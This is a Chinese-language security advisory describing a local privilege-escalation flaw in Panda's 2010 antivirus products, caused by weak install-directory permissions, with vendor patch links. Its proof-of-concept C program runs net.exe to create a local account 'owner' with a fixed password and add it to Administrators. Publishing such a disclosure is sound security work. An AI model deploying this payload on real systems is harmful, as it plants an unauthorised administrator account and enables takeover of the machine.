漏洞起因
设计错误
危险等级
低
影响系统
Panda Antivirus Pro 2010 9.x
Panda Global Protection 2010 3.x
Panda Internet Security 2010 15.x
不受影响系统
危害
本地攻击者可以利用漏洞以SYSTEM权限执行任意命令。
攻击所需条件
攻击者必须访问Panda产品所在系统。
漏洞信息
Panda公司提供Antivirus Pro,Global Protection,Internet Security等安全产品。
Panda包含的多个产品默认安装目录设置的权限不够严谨,本地攻击者可以通过替换应用程序提升特权,以SYSTEM权限执行任意命令。
测试方法
#include <windows.h>
#include <stdio.h>
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"…\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
printf( "Adding user \"owner\" to the local Administrators group…\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );
system( szCmdLine );
return 0;
}
厂商解决方案
用户可参考如下供应商提供的补丁程序:
Panda Global Protection 2010:
http://www.pandasecurity.com/resources/sop/PGP10/hfgp30906s22_r4.exe
Panda Internet Security 2010:
http://www.pandasecurity.com/resources/sop/PIS10/hfp150906s25_r1.exe
Panda Antivirus Pro 2010:
http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe
Panda Antivirus for Netbooks 2010:
http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe
漏洞提供者
NSO Research (nso-researchsotiriu.de)
0 条评论。